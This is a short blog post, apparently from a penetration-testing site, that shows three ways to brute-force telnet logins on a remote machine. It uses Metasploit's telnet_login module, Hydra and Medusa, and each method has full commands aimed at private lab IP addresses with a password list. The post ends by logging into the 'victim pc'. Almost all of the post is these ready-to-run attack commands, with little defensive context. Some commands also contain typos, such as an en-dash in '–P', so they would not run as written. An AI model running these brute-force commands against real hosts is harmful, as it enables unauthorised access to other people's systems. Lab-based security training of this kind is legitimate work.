Quantcast
Channel: Penetration Testing Archives - Hacking Articles
Viewing all articles
Browse latest Browse all 812

3 Ways to Hack Telnet Passsword of Remote PC

$
0
0

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/telnet/telnet_login

msf exploit (telnet_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (telnet_login)>set rhosts 192.168.0.131 (IP of Remote Host)

msf exploit (telnet_login)>set verbose true

msf exploit (telnet_login)> exploit

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -l msfadmin –P /root/Desktop/pass.txt 192.168.0.131 telnet

  • -l indicates a single username (use -L for a username list)
  • -P indicates use the following password list
  • ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.35 -u msfadmin –P /root/Desktop/pass.txt –M telnet

Now connect victim pc using telnet command  result are shown below.

telnet 192.168.0.131

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

The post 3 Ways to Hack Telnet Passsword of Remote PC appeared first on Hacking Articles.


Viewing all articles
Browse latest Browse all 812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>